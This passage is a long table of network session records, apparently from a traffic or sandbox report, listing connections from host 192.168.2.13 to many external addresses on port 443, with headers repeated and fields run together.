                                    11903192.168.2.1356054114.132.51.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11904192.168.2.1354894181.140.15.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11905192.168.2.134866813.15.58.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11906192.168.2.1336566211.179.212.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11907192.168.2.1355668142.147.93.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11908192.168.2.1342566193.227.168.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11909192.168.2.1351296114.58.200.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11910192.168.2.1355128220.170.98.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11911192.168.2.134288439.16.42.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11912192.168.2.1339508111.107.224.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11913192.168.2.1358360159.201.219.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11914192.168.2.1333886178.13.248.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11915192.168.2.134840864.144.45.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11916192.168.2.134447427.69.172.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11917192.168.2.1348592102.181.210.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11918192.168.2.133622035.96.29.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11919192.168.2.134985841.232.78.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11920192.168.2.133848096.103.98.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11921192.168.2.1335728223.162.72.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11922192.168.2.1334598181.222.222.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11923192.168.2.1354236185.141.171.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11924192.168.2.1360002113.45.126.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11925192.168.2.133388635.202.212.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11926192.168.2.133624619.250.114.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11927192.168.2.135196497.170.81.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11928192.168.2.1336504102.72.165.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11929192.168.2.13545765.236.33.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11930192.168.2.1337078109.22.193.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11931192.168.2.13422404.49.163.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11932192.168.2.133702812.64.61.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11933192.168.2.134197814.42.138.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11934192.168.2.1360466114.141.247.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11935192.168.2.135414839.154.68.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11936192.168.2.1340128139.251.1.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11937192.168.2.1338178175.139.11.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11938192.168.2.135376892.214.123.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11939192.168.2.133677017.54.183.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11940192.168.2.1338054207.170.71.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11941192.168.2.1354970213.67.86.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11942192.168.2.1343460119.157.103.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11943192.168.2.135930412.84.70.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11944192.168.2.133774899.242.139.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11945192.168.2.1353588151.224.176.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11946192.168.2.134113853.239.127.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11947192.168.2.134331278.72.153.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11948192.168.2.1354254165.114.97.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11949192.168.2.1336266120.193.218.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11950192.168.2.1340940128.180.252.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11951192.168.2.134967238.140.87.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11952192.168.2.1341906104.152.125.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11953192.168.2.1350396171.66.216.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11954192.168.2.1351638186.18.151.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11955192.168.2.135675831.31.96.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11956192.168.2.135077290.48.166.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11957192.168.2.133605278.135.25.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11958192.168.2.133511872.117.62.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11959192.168.2.1340876105.223.40.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11960192.168.2.135839871.227.141.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11961192.168.2.1343512186.106.182.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11962192.168.2.1351840149.216.203.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11963192.168.2.133329244.170.248.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11964192.168.2.1344458184.151.28.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11965192.168.2.136082839.132.184.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11966192.168.2.1359020105.79.61.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11967192.168.2.1351680177.85.74.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11968192.168.2.1347688217.80.182.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11969192.168.2.1339302207.126.157.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11970192.168.2.134041069.39.87.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11971192.168.2.1356120194.233.18.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11972192.168.2.133506874.30.48.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11973192.168.2.1359842108.141.40.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11974192.168.2.1358748182.194.244.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11975192.168.2.135510840.142.166.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11976192.168.2.133438254.164.91.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11977192.168.2.1333260222.24.113.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11978192.168.2.1347728135.84.246.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11979192.168.2.133432646.163.202.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11980192.168.2.135878289.221.81.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11981192.168.2.1356586162.66.188.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11982192.168.2.13574565.175.89.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11983192.168.2.133985045.255.35.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11984192.168.2.1359292172.255.129.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11985192.168.2.1346418159.190.121.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11986192.168.2.135880496.103.68.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11987192.168.2.133675068.23.77.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11988192.168.2.1346208145.118.149.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11989192.168.2.1338472213.123.16.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11990192.168.2.134659249.211.240.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11991192.168.2.1348758199.161.250.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11992192.168.2.1357716128.124.78.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11993192.168.2.1334572141.204.85.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11994192.168.2.1334846199.92.245.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11995192.168.2.1353604205.134.80.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11996192.168.2.135878219.22.228.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11997192.168.2.1360706185.140.217.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11998192.168.2.1338882209.85.33.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11999192.168.2.136060036.160.124.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12000192.168.2.1342324168.11.196.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12001192.168.2.134832638.71.100.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12002192.168.2.1346386132.205.66.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12003192.168.2.1342006133.192.147.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12004192.168.2.1350704197.92.94.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12005192.168.2.134644890.202.187.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12006192.168.2.1357664222.131.173.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12007192.168.2.133535831.238.38.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12008192.168.2.1345860118.93.215.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12009192.168.2.1338664209.14.172.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12010192.168.2.135032490.58.102.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12011192.168.2.134234045.51.78.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12012192.168.2.134016449.136.139.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12013192.168.2.1334598156.96.116.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12014192.168.2.1356726195.39.53.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12015192.168.2.1339998201.67.15.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12016192.168.2.1336728198.167.51.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12017192.168.2.1355890147.244.115.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12018192.168.2.1345466218.46.217.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12019192.168.2.135115844.163.135.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12020192.168.2.135711279.167.59.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12021192.168.2.135468048.175.174.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12022192.168.2.135591093.222.93.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12023192.168.2.135647875.150.150.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12024192.168.2.135395658.50.66.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12025192.168.2.1351394195.119.32.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12026192.168.2.135800860.246.242.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12027192.168.2.1344128189.33.52.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12028192.168.2.13592582.219.151.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12029192.168.2.1338952159.35.160.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12030192.168.2.135631068.241.131.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12031192.168.2.1346278176.67.176.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12032192.168.2.1354658162.28.60.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12033192.168.2.133584624.9.11.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12034192.168.2.134526425.132.198.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12035192.168.2.1356544154.50.37.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12036192.168.2.1356704147.41.237.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12037192.168.2.1346378133.56.40.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12038192.168.2.1355498149.174.14.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12039192.168.2.133418682.240.183.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12040192.168.2.133450871.2.139.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12041192.168.2.1333504204.232.97.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12042192.168.2.1341362182.12.210.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12043192.168.2.1348020118.247.61.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12044192.168.2.1332778220.126.29.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12045192.168.2.135648276.29.236.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12046192.168.2.1352374223.84.12.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12047192.168.2.1335474138.87.48.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12048192.168.2.1356094163.42.54.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12049192.168.2.1351604113.85.233.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12050192.168.2.1339518202.49.35.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12051192.168.2.134875451.65.198.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12052192.168.2.1360914171.101.200.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12053192.168.2.1340478139.232.70.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12054192.168.2.1351298122.84.28.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12055192.168.2.1346602207.96.158.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12056192.168.2.1345884188.156.102.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12057192.168.2.136023467.35.53.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12058192.168.2.133719479.40.58.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12059192.168.2.1359058194.232.235.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12060192.168.2.133417045.153.29.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12061192.168.2.1337050119.241.204.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12062192.168.2.1344904105.66.163.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12063192.168.2.1355410159.188.115.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12064192.168.2.134709098.253.195.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12065192.168.2.1355366188.19.227.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12066192.168.2.1356028188.219.101.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12067192.168.2.135345044.215.126.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12068192.168.2.133653891.138.208.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12069192.168.2.135927894.11.202.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12070192.168.2.135584631.239.22.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12071192.168.2.1348206201.113.117.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12072192.168.2.133747287.90.232.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12073192.168.2.135953073.11.93.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12074192.168.2.135292213.33.26.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12075192.168.2.1336428131.212.251.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12076192.168.2.133493685.41.204.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12077192.168.2.1358506110.132.202.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12078192.168.2.1338182104.24.24.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12079192.168.2.1346342202.134.0.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12080192.168.2.1337332105.246.223.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12081192.168.2.135541694.124.78.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12082192.168.2.1356548204.175.137.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12083192.168.2.1355368143.203.50.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12084192.168.2.134003036.159.41.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12085192.168.2.135751089.5.56.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12086192.168.2.1351636185.130.255.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12087192.168.2.1359920151.252.123.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12088192.168.2.1333494147.232.236.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12089192.168.2.1358784222.248.142.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12090192.168.2.1359166172.4.5.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12091192.168.2.1340958169.17.220.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12092192.168.2.1342534219.254.206.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12093192.168.2.133940247.149.175.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12094192.168.2.1358620135.2.111.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12095192.168.2.134731453.129.163.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12096192.168.2.1358902195.223.95.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12097192.168.2.1345684185.234.123.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12098192.168.2.134081840.105.193.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12099192.168.2.1342088114.8.192.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12100192.168.2.1352840201.187.247.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12101192.168.2.135077678.127.236.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12102192.168.2.1358694170.99.36.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12103192.168.2.135915897.120.114.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12104192.168.2.1359930136.224.3.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12105192.168.2.1357156221.75.25.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12106192.168.2.134313038.219.50.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12107192.168.2.133880432.114.235.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12108192.168.2.1335730149.197.115.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12109192.168.2.1343850178.111.79.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12110192.168.2.1356530195.180.96.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12111192.168.2.133328250.47.25.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12112192.168.2.1339280139.172.189.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12113192.168.2.1334966212.49.199.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12114192.168.2.1337104199.253.66.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12115192.168.2.1346114168.181.197.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12116192.168.2.1345022204.102.59.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12117192.168.2.1335254217.119.178.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12118192.168.2.135483614.22.40.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12119192.168.2.133796248.20.52.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12120192.168.2.1356786145.74.240.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12121192.168.2.134191812.237.69.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12122192.168.2.1343934201.221.8.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12123192.168.2.133830476.171.209.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12124192.168.2.135831420.131.224.3443
                                    TimestampBytes transferredDirectionData


